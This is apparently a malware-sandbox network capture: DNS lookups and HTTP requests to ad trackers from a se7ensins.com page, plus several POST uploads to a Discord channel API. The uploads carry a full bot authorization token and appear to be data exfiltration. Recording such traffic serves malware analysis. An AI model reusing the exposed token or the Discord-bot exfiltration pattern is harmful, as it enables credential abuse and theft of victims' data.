AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEQagCzDQuIAuyJCQm0DCKBACIKwgIoEAAAAJA0QEALgwKdgYBLrCRACBFAAcEAIQAUZAAgAAEgAQiACQIoEAAEAgEAAIAEAgEADAwADgAtBAIAAQHQMUwoAFAsIEiMiIUwIQoEggJbKBBKCoQVwgCLDAigERsFAAgCQEVgACAsXgMASAlYkECXUG0AABAAgFFKFQik_MAQ4Jmy1V4om0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAA.egAAAbgAAAAA&us_privacy=
date: Sun, 26 May 2024 02:07:20 GMT
strict-transport-security: max-age=63072000; includeSubDomains; preload
GET

https://id5-sync.com/c/882/0/8/1.gif?gdpr=1&gdpr_consent=CP_ONMAP_ONMAAKA1AENDgCsAP_AAEPAACiQg1NX_H__bW9r8X7_aft0eY1P9_j77sQxBhfJE-4F3LvW_JwXx2E5NF36tqoKmRoEu3ZBIUNlHJHUTVmwaogVryHsakWcoTNKJ6BkkFMRM2dYCF5vm4tjeQKY5_p_d3fx2D-t_dv839zzz8VHn3e5fue0-PCdU5-9Dfn9fRfb-9IP9_78v8v8_l_rk2_eT13_pcvr_D--f_87_XW-9_cAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEQagCzDQuIAuyJCQm0DCKBACIKwgIoEAAAAJA0QEALgwKdgYBLrCRACBFAAcEAIQAUZAAgAAEgAQiACQIoEAAEAgEAAIAEAgEADAwADgAtBAIAAQHQMUwoAFAsIEiMiIUwIQoEggJbKBBKCoQVwgCLDAigERsFAAgCQEVgACAsXgMASAlYkECXUG0AABAAgFFKFQik_MAQ4Jmy1V4om0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAA.egAAAbgAAAAA&us_privacy=

Request

GET /c/882/0/8/1.gif?gdpr=1&gdpr_consent=CP_ONMAP_ONMAAKA1AENDgCsAP_AAEPAACiQg1NX_H__bW9r8X7_aft0eY1P9_j77sQxBhfJE-4F3LvW_JwXx2E5NF36tqoKmRoEu3ZBIUNlHJHUTVmwaogVryHsakWcoTNKJ6BkkFMRM2dYCF5vm4tjeQKY5_p_d3fx2D-t_dv839zzz8VHn3e5fue0-PCdU5-9Dfn9fRfb-9IP9_78v8v8_l_rk2_eT13_pcvr_D--f_87_XW-9_cAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEQagCzDQuIAuyJCQm0DCKBACIKwgIoEAAAAJA0QEALgwKdgYBLrCRACBFAAcEAIQAUZAAgAAEgAQiACQIoEAAEAgEAAIAEAgEADAwADgAtBAIAAQHQMUwoAFAsIEiMiIUwIQoEggJbKBBKCoQVwgCLDAigERsFAAgCQEVgACAsXgMASAlYkECXUG0AABAAgFFKFQik_MAQ4Jmy1V4om0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAA.egAAAbgAAAAA&us_privacy= HTTP/2.0
host: id5-sync.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
accept: image/avif,image/webp,*/*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
referer: https://www.se7ensins.com/
sec-fetch-dest: image
sec-fetch-mode: no-cors
sec-fetch-site: cross-site
te: trailers

Response

HTTP/2.0 200

vary: Origin
vary: Access-Control-Request-Method
vary: Access-Control-Request-Headers
p3p: CP="CAO PSA OUR"
set-cookie: cf=; Max-Age=0; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Domain=id5-sync.com; Path=/; SameSite=None; Secure
set-cookie: cip=; Max-Age=0; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Domain=id5-sync.com; Path=/; SameSite=None; Secure
set-cookie: cnac=; Max-Age=0; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Domain=id5-sync.com; Path=/; SameSite=None; Secure
set-cookie: car=; Max-Age=0; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Domain=id5-sync.com; Path=/; SameSite=None; Secure
set-cookie: gdpr=; Max-Age=0; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Domain=id5-sync.com; Path=/; SameSite=None; Secure
set-cookie: gpp=; Max-Age=0; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Domain=id5-sync.com; Path=/; SameSite=None; Secure
set-cookie: callback=; Max-Age=0; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Domain=id5-sync.com; Path=/; SameSite=None; Secure
content-type: image/gif;charset=UTF-8
date: Sun, 26 May 2024 02:07:19 GMT
strict-transport-security: max-age=63072000; includeSubDomains; preload
GET

https://lb.eu-1-id5-sync.com/lb/v1

Request

GET /lb/v1 HTTP/2.0
host: lb.eu-1-id5-sync.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
accept: */*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
origin: https://www.se7ensins.com
sec-fetch-dest: empty
sec-fetch-mode: cors
sec-fetch-site: cross-site
referer: https://www.se7ensins.com/
te: trailers

Response

HTTP/2.0 200

vary: Origin
vary: Access-Control-Request-Method
vary: Access-Control-Request-Headers
access-control-allow-origin: https://www.se7ensins.com
vary: Origin
content-type: application/json;charset=UTF-8
date: Sun, 26 May 2024 02:07:20 GMT
strict-transport-security: max-age=63072000; includeSubDomains; preload
DNS

id5-sync.com

Request

id5-sync.com

IN AAAA

Response
POST

https://discord.com/api/v9/channels/1244109081116151869/messages

Request

POST /api/v9/channels/1244109081116151869/messages HTTP/1.1
authorization: Bot MTIxNTQyMjc0OTk4ODg4NDU3Mg.G8QiY3.e2k047pCmhPxBH-tdaOfxVTB1BY3dSfZIT_sXY
Content-Type: multipart/form-data; boundary="ea0373f2-d843-428a-9c1c-25c0682dc070"
Host: discord.com
Content-Length: 3557
Expect: 100-continue

Response

HTTP/1.1 200 OK

Date: Sun, 26 May 2024 02:07:21 GMT
Content-Type: application/json
Transfer-Encoding: chunked
Connection: keep-alive
set-cookie: __dcfduid=af9410321b0411efa4b75aa98193d0cf; Expires=Fri, 25-May-2029 02:07:21 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
strict-transport-security: max-age=31536000; includeSubDomains; preload
x-ratelimit-bucket: 3df15bae86f6647dd4dfcbd5c6949480
x-ratelimit-limit: 5
x-ratelimit-remaining: 4
x-ratelimit-reset: 1716689241.904
x-ratelimit-reset-after: 1.000
vary: Accept-Encoding
via: 1.1 google
alt-svc: h3=":443"; ma=86400
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UqELhYSKOPKHDTaUxvIvK5goX1uJTxKWYnSrRTvIxAdPWkN1TPBPRJR%2Btq7PU%2F13lN9jmDFWW1ZSOfBRSrbZW71VSDtOWeZg%2F%2BNlVhjNQizs434DK4iqplP5Rx0h"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
X-Content-Type-Options: nosniff
Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
Set-Cookie: __sdcfduid=af9410321b0411efa4b75aa98193d0cff4375e38d70892f0dca25e192210b5149e0640f36b5a51786f9e9f147f9f9931; Expires=Fri, 25-May-2029 02:07:21 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
Set-Cookie: __cfruid=322698ff26172aa378ae1dda2743bdb1ad231a65-1716689241; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Set-Cookie: _cfuvid=ScfjGeFppy7DzesdW.jXCvw2nu3SSqJbiR5jRij2QAo-1716689241175-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Server: cloudflare
CF-RAY: 889a360a8e03dd86-LHR
POST

https://discord.com/api/v9/channels/1244109081116151869/messages

Request

POST /api/v9/channels/1244109081116151869/messages HTTP/1.1
authorization: Bot MTIxNTQyMjc0OTk4ODg4NDU3Mg.G8QiY3.e2k047pCmhPxBH-tdaOfxVTB1BY3dSfZIT_sXY
Content-Type: application/json; charset=utf-8
Host: discord.com
Content-Length: 31
Expect: 100-continue

Response

HTTP/1.1 200 OK

Date: Sun, 26 May 2024 02:07:21 GMT
Content-Type: application/json
Transfer-Encoding: chunked
Connection: keep-alive
set-cookie: __dcfduid=afca8ac21b0411efbef092d88e6aaaae; Expires=Fri, 25-May-2029 02:07:21 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
strict-transport-security: max-age=31536000; includeSubDomains; preload
x-ratelimit-bucket: 3df15bae86f6647dd4dfcbd5c6949480
x-ratelimit-limit: 5
x-ratelimit-remaining: 3
x-ratelimit-reset: 1716689242.901
x-ratelimit-reset-after: 1.522
vary: Accept-Encoding
via: 1.1 google
alt-svc: h3=":443"; ma=86400
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cQ61ga4Kj3uKZiPuQvDC%2BvZPlb%2FPAl9rRW%2FEUMKKl9RB5PgyuUMZ2oLajK3wIDR81X14ZthoOl2lx3rOySWCvOU6yuowZNxP5DNSVc%2BA2Pfa%2Fcdlodlvm26v8DAP"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
X-Content-Type-Options: nosniff
Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
Set-Cookie: __sdcfduid=afca8ac21b0411efbef092d88e6aaaae1689ccbe6cfcf71851bf299a7d3bd3ae4ba628a79587ad63f572ea753e70de03; Expires=Fri, 25-May-2029 02:07:21 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
Set-Cookie: __cfruid=322698ff26172aa378ae1dda2743bdb1ad231a65-1716689241; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Set-Cookie: _cfuvid=HoFvf8vcBgkxSmPtqEIHLeWihI0TXBX.7qFr21XJg0I-1716689241534-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Server: cloudflare
CF-RAY: 889a360dfbd16559-LHR
DNS

static.criteo.net

Request

static.criteo.net

IN A

Response

static.criteo.net

IN CNAME

static.nl3.vip.prod.criteo.net

static.nl3.vip.prod.criteo.net

IN A

178.250.1.3
GET

https://static.criteo.net/js/ld/publishertag.prebid.144.js

Request

GET /js/ld/publishertag.prebid.144.js HTTP/2.0
host: static.criteo.net
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
accept: */*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
sec-fetch-dest: script
sec-fetch-mode: no-cors
sec-fetch-site: cross-site
referer: https://www.se7ensins.com/
te: trailers

Response

HTTP/2.0 200

server: nginx
date: Sun, 26 May 2024 02:07:21 GMT
content-type: text/javascript
last-modified: Fri, 27 Oct 2023 06:43:26 GMT
etag: W/"653b5c0e-1811e"
expires: Mon, 27 May 2024 02:07:21 GMT
cache-control: max-age=86400
cross-origin-resource-policy: cross-origin
cache-control: public
timing-allow-origin: *
access-control-allow-origin: *
content-encoding: gzip
strict-transport-security: max-age=31536000; preload;
DNS

static.nl3.vip.prod.criteo.net

Request

static.nl3.vip.prod.criteo.net

IN A

Response

static.nl3.vip.prod.criteo.net

IN A

178.250.1.3
DNS

static.nl3.vip.prod.criteo.net

Request

static.nl3.vip.prod.criteo.net

IN AAAA

Response

static.nl3.vip.prod.criteo.net

IN AAAA

2a02:2638:3::3
GET

https://static.criteo.net/js/ld/publishertag.prebid.144.js

Request

GET /js/ld/publishertag.prebid.144.js HTTP/2.0
host: static.criteo.net
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
accept: */*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
origin: https://www.se7ensins.com
sec-fetch-dest: empty
sec-fetch-mode: cors
sec-fetch-site: cross-site
referer: https://www.se7ensins.com/
te: trailers

Response

HTTP/2.0 200

server: nginx
date: Sun, 26 May 2024 02:07:21 GMT
content-type: text/javascript
last-modified: Fri, 27 Oct 2023 06:43:26 GMT
etag: W/"653b5c0e-1811e"
expires: Mon, 27 May 2024 02:07:21 GMT
cache-control: max-age=86400
cross-origin-resource-policy: cross-origin
cache-control: public
timing-allow-origin: *
access-control-allow-origin: *
content-encoding: gzip
strict-transport-security: max-age=31536000; preload;
DNS

3.1.250.178.in-addr.arpa

Request

3.1.250.178.in-addr.arpa

IN PTR

Response
DNS

ag.gbc.criteo.com

Request

ag.gbc.criteo.com

IN A

Response

ag.gbc.criteo.com

IN CNAME

gbc8.nl3.eu.criteo.com

gbc8.nl3.eu.criteo.com

IN A

185.235.87.225

gbc8.nl3.eu.criteo.com

IN A

185.235.87.250

gbc8.nl3.eu.criteo.com

IN A

185.235.87.228

gbc8.nl3.eu.criteo.com

IN A

185.235.87.235

gbc8.nl3.eu.criteo.com

IN A

185.235.87.236

gbc8.nl3.eu.criteo.com

IN A

185.235.87.242

gbc8.nl3.eu.criteo.com

IN A

185.235.87.224

gbc8.nl3.eu.criteo.com

IN A

185.235.87.249

gbc8.nl3.eu.criteo.com

IN A

185.235.87.248

gbc8.nl3.eu.criteo.com

IN A

185.235.87.232

gbc8.nl3.eu.criteo.com

IN A

185.235.87.229

gbc8.nl3.eu.criteo.com

IN A

185.235.87.247

gbc8.nl3.eu.criteo.com

IN A

185.235.87.241

gbc8.nl3.eu.criteo.com

IN A

185.235.87.245

gbc8.nl3.eu.criteo.com

IN A

185.235.87.243

gbc8.nl3.eu.criteo.com

IN A

185.235.87.231

gbc8.nl3.eu.criteo.com

IN A

185.235.87.233

gbc8.nl3.eu.criteo.com

IN A

185.235.87.244

gbc8.nl3.eu.criteo.com

IN A

185.235.87.246

gbc8.nl3.eu.criteo.com

IN A

185.235.87.240

gbc8.nl3.eu.criteo.com

IN A

185.235.87.227

gbc8.nl3.eu.criteo.com

IN A

185.235.87.238

gbc8.nl3.eu.criteo.com

IN A

185.235.87.239

gbc8.nl3.eu.criteo.com

IN A

185.235.87.226

gbc8.nl3.eu.criteo.com

IN A

185.235.87.234

gbc8.nl3.eu.criteo.com

IN A

185.235.87.237

gbc8.nl3.eu.criteo.com

IN A

185.235.87.251

gbc8.nl3.eu.criteo.com

IN A

185.235.87.230
DNS

gem.gbc.criteo.com

Request

gem.gbc.criteo.com

IN A

Response

gem.gbc.criteo.com

IN CNAME

gbc2.nl3.eu.criteo.com

gbc2.nl3.eu.criteo.com

IN A

185.235.87.70

gbc2.nl3.eu.criteo.com

IN A

185.235.87.61

gbc2.nl3.eu.criteo.com

IN A

185.235.87.67

gbc2.nl3.eu.criteo.com

IN A

185.235.87.60

gbc2.nl3.eu.criteo.com

IN A

185.235.87.63

gbc2.nl3.eu.criteo.com

IN A

185.235.87.59

gbc2.nl3.eu.criteo.com

IN A

185.235.87.68

gbc2.nl3.eu.criteo.com

IN A

185.235.87.58

gbc2.nl3.eu.criteo.com

IN A

185.235.87.81

gbc2.nl3.eu.criteo.com

IN A

185.235.87.72

gbc2.nl3.eu.criteo.com

IN A

185.235.87.79

gbc2.nl3.eu.criteo.com

IN A

185.235.87.66

gbc2.nl3.eu.criteo.com

IN A

185.235.87.56

gbc2.nl3.eu.criteo.com

IN A

185.235.87.73

gbc2.nl3.eu.criteo.com

IN A

185.235.87.75

gbc2.nl3.eu.criteo.com

IN A

185.235.87.76

gbc2.nl3.eu.criteo.com

IN A

185.235.87.71

gbc2.nl3.eu.criteo.com

IN A

185.235.87.77

gbc2.nl3.eu.criteo.com

IN A

185.235.87.65

gbc2.nl3.eu.criteo.com

IN A

185.235.87.57

gbc2.nl3.eu.criteo.com

IN A

185.235.87.83

gbc2.nl3.eu.criteo.com

IN A

185.235.87.74

gbc2.nl3.eu.criteo.com

IN A

185.235.87.80

gbc2.nl3.eu.criteo.com

IN A

185.235.87.62

gbc2.nl3.eu.criteo.com

IN A

185.235.87.64

gbc2.nl3.eu.criteo.com

IN A

185.235.87.78

gbc2.nl3.eu.criteo.com

IN A

185.235.87.69

gbc2.nl3.eu.criteo.com

IN A

185.235.87.82
DNS

gbc8.nl3.eu.criteo.com

Request

gbc8.nl3.eu.criteo.com

IN A

Response

gbc8.nl3.eu.criteo.com

IN A

185.235.87.235

gbc8.nl3.eu.criteo.com

IN A

185.235.87.227

gbc8.nl3.eu.criteo.com

IN A

185.235.87.237

gbc8.nl3.eu.criteo.com

IN A

185.235.87.243

gbc8.nl3.eu.criteo.com

IN A

185.235.87.238

gbc8.nl3.eu.criteo.com

IN A

185.235.87.241

gbc8.nl3.eu.criteo.com

IN A

185.235.87.228

gbc8.nl3.eu.criteo.com

IN A

185.235.87.230

gbc8.nl3.eu.criteo.com

IN A

185.235.87.246

gbc8.nl3.eu.criteo.com

IN A

185.235.87.249

gbc8.nl3.eu.criteo.com

IN A

185.235.87.240

gbc8.nl3.eu.criteo.com

IN A

185.235.87.239

gbc8.nl3.eu.criteo.com

IN A

185.235.87.231

gbc8.nl3.eu.criteo.com

IN A

185.235.87.242

gbc8.nl3.eu.criteo.com

IN A

185.235.87.244

gbc8.nl3.eu.criteo.com

IN A

185.235.87.226

gbc8.nl3.eu.criteo.com

IN A

185.235.87.229

gbc8.nl3.eu.criteo.com

IN A

185.235.87.224

gbc8.nl3.eu.criteo.com

IN A

185.235.87.251

gbc8.nl3.eu.criteo.com

IN A

185.235.87.233

gbc8.nl3.eu.criteo.com

IN A

185.235.87.245

gbc8.nl3.eu.criteo.com

IN A

185.235.87.248

gbc8.nl3.eu.criteo.com

IN A

185.235.87.234

gbc8.nl3.eu.criteo.com

IN A

185.235.87.236

gbc8.nl3.eu.criteo.com

IN A

185.235.87.232

gbc8.nl3.eu.criteo.com

IN A

185.235.87.250

gbc8.nl3.eu.criteo.com

IN A

185.235.87.225

gbc8.nl3.eu.criteo.com

IN A

185.235.87.247
DNS

gbc2.nl3.eu.criteo.com

Request

gbc2.nl3.eu.criteo.com

IN A

Response

gbc2.nl3.eu.criteo.com

IN A

185.235.87.77

gbc2.nl3.eu.criteo.com

IN A

185.235.87.56

gbc2.nl3.eu.criteo.com

IN A

185.235.87.60

gbc2.nl3.eu.criteo.com

IN A

185.235.87.78

gbc2.nl3.eu.criteo.com

IN A

185.235.87.76

gbc2.nl3.eu.criteo.com

IN A

185.235.87.68

gbc2.nl3.eu.criteo.com

IN A

185.235.87.73

gbc2.nl3.eu.criteo.com

IN A

185.235.87.71

gbc2.nl3.eu.criteo.com

IN A

185.235.87.75

gbc2.nl3.eu.criteo.com

IN A

185.235.87.79

gbc2.nl3.eu.criteo.com

IN A

185.235.87.61

gbc2.nl3.eu.criteo.com

IN A

185.235.87.63

gbc2.nl3.eu.criteo.com

IN A

185.235.87.67

gbc2.nl3.eu.criteo.com

IN A

185.235.87.66

gbc2.nl3.eu.criteo.com

IN A

185.235.87.82

gbc2.nl3.eu.criteo.com

IN A

185.235.87.57

gbc2.nl3.eu.criteo.com

IN A

185.235.87.65

gbc2.nl3.eu.criteo.com

IN A

185.235.87.64

gbc2.nl3.eu.criteo.com

IN A

185.235.87.58

gbc2.nl3.eu.criteo.com

IN A

185.235.87.81

gbc2.nl3.eu.criteo.com

IN A

185.235.87.83

gbc2.nl3.eu.criteo.com

IN A

185.235.87.80

gbc2.nl3.eu.criteo.com

IN A

185.235.87.70

gbc2.nl3.eu.criteo.com

IN A

185.235.87.72

gbc2.nl3.eu.criteo.com

IN A

185.235.87.62

gbc2.nl3.eu.criteo.com

IN A

185.235.87.59

gbc2.nl3.eu.criteo.com

IN A

185.235.87.74

gbc2.nl3.eu.criteo.com

IN A

185.235.87.69
DNS

gbc8.nl3.eu.criteo.com

Request

gbc8.nl3.eu.criteo.com

IN AAAA

Response
DNS

gbc2.nl3.eu.criteo.com

Request

gbc2.nl3.eu.criteo.com

IN AAAA

Response
GET

https://ag.gbc.criteo.com/newidsd

Request

GET /newidsd HTTP/2.0
host: ag.gbc.criteo.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
accept: */*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
referer: https://gum.criteo.com/
origin: https://gum.criteo.com
sec-fetch-dest: empty
sec-fetch-mode: cors
sec-fetch-site: same-site
te: trailers

Response

HTTP/2.0 200

content-type: application/json; charset=utf-8
date: Sun, 26 May 2024 02:07:21 GMT
server: Kestrel
access-control-allow-credentials: true
access-control-allow-methods: GET
access-control-allow-origin: https://gum.criteo.com
cache-control: no-cache, no-store, must-revalidate
expires: 0
pragma: no-cache
server-processing-duration-in-ticks: 47419
strict-transport-security: max-age=31536000; preload;
vary: Accept-Encoding
content-encoding: gzip
GET

https://gem.gbc.criteo.com/newidsd

Request

GET /newidsd HTTP/2.0
host: gem.gbc.criteo.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
accept: */*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
referer: https://gum.criteo.com/
origin: https://gum.criteo.com
sec-fetch-dest: empty
sec-fetch-mode: cors
sec-fetch-site: same-site
te: trailers

Response

HTTP/2.0 200

content-type: application/json; charset=utf-8
date: Sun, 26 May 2024 02:07:21 GMT
server: Kestrel
access-control-allow-credentials: true
access-control-allow-methods: GET
access-control-allow-origin: https://gum.criteo.com
cache-control: no-cache, no-store, must-revalidate
expires: 0
pragma: no-cache
server-processing-duration-in-ticks: 42219
strict-transport-security: max-age=31536000; preload;
vary: Accept-Encoding
content-encoding: gzip
DNS

70.87.235.185.in-addr.arpa

Request

70.87.235.185.in-addr.arpa

IN PTR

Response
DNS

225.87.235.185.in-addr.arpa

Request

225.87.235.185.in-addr.arpa

IN PTR

Response
DNS

16.173.189.20.in-addr.arpa

Request

16.173.189.20.in-addr.arpa

IN PTR

Response
POST

https://discord.com/api/v9/channels/1244109081116151869/messages

Request

POST /api/v9/channels/1244109081116151869/messages HTTP/1.1
authorization: Bot MTIxNTQyMjc0OTk4ODg4NDU3Mg.G8QiY3.e2k047pCmhPxBH-tdaOfxVTB1BY3dSfZIT_sXY
Content-Type: multipart/form-data; boundary="1eaa2ac5-cb06-44c8-9fd3-95020cf18995"
Host: discord.com
Content-Length: 88620
Expect: 100-continue

Response

HTTP/1.1 200 OK

Date: Sun, 26 May 2024 02:07:25 GMT
Content-Type: application/json
Transfer-Encoding: chunked
Connection: keep-alive
set-cookie: __dcfduid=b1ddf2a41b0411ef9c08ee42206204f4; Expires=Fri, 25-May-2029 02:07:24 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
strict-transport-security: max-age=31536000; includeSubDomains; preload
x-ratelimit-bucket: 3df15bae86f6647dd4dfcbd5c6949480
x-ratelimit-limit: 5
x-ratelimit-remaining: 4
x-ratelimit-reset: 1716689245.790
x-ratelimit-reset-after: 1.000
vary: Accept-Encoding
via: 1.1 google
alt-svc: h3=":443"; ma=86400
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ga%2BPjUHDr1h3n1QQst%2FCCMAwK5QLG7pQ5dCgSZdyCsLkKSOPc0O1AiwtvMbBunjVuI5sL5piaDXqM1qpkGVpayYCpqe2agzYMdqVt4c39WJXuMlNhPYVwd4d%2BVQD"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
X-Content-Type-Options: nosniff
Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
Set-Cookie: __sdcfduid=b1ddf2a41b0411ef9c08ee42206204f4178b563f73acb6626450b3393d3d4eaf1b503e9bb2f50198335db9372faeaf83; Expires=Fri, 25-May-2029 02:07:24 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
Set-Cookie: __cfruid=3137eb2b2f52ad8195125d8f62deb9b714b4ecb1-1716689245; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Set-Cookie: _cfuvid=FeZoAqBke32.R_bf52Zp2vNA.cNcuQQq37KyJSjo.v8-1716689245014-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Server: cloudflare
CF-RAY: 889a3622cfb7886d-LHR
POST

https://discord.com/api/v9/channels/1244109081116151869/messages

Request

POST /api/v9/channels/1244109081116151869/messages HTTP/1.1
authorization: Bot MTIxNTQyMjc0OTk4ODg4NDU3Mg.G8QiY3.e2k047pCmhPxBH-tdaOfxVTB1BY3dSfZIT_sXY
Content-Type: application/json; charset=utf-8
Host: discord.com
Content-Length: 31
Expect: 100-continue

Response

HTTP/1.1 200 OK

Date: Sun, 26 May 2024 02:07:25 GMT
Content-Type: application/json
Transfer-Encoding: chunked
Connection: keep-alive
set-cookie: __dcfduid=b209cfc81b0411ef99c54236d2de1b36; Expires=Fri, 25-May-2029 02:07:25 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
strict-transport-security: max-age=31536000; includeSubDomains; preload
x-ratelimit-bucket: 3df15bae86f6647dd4dfcbd5c6949480
x-ratelimit-limit: 5
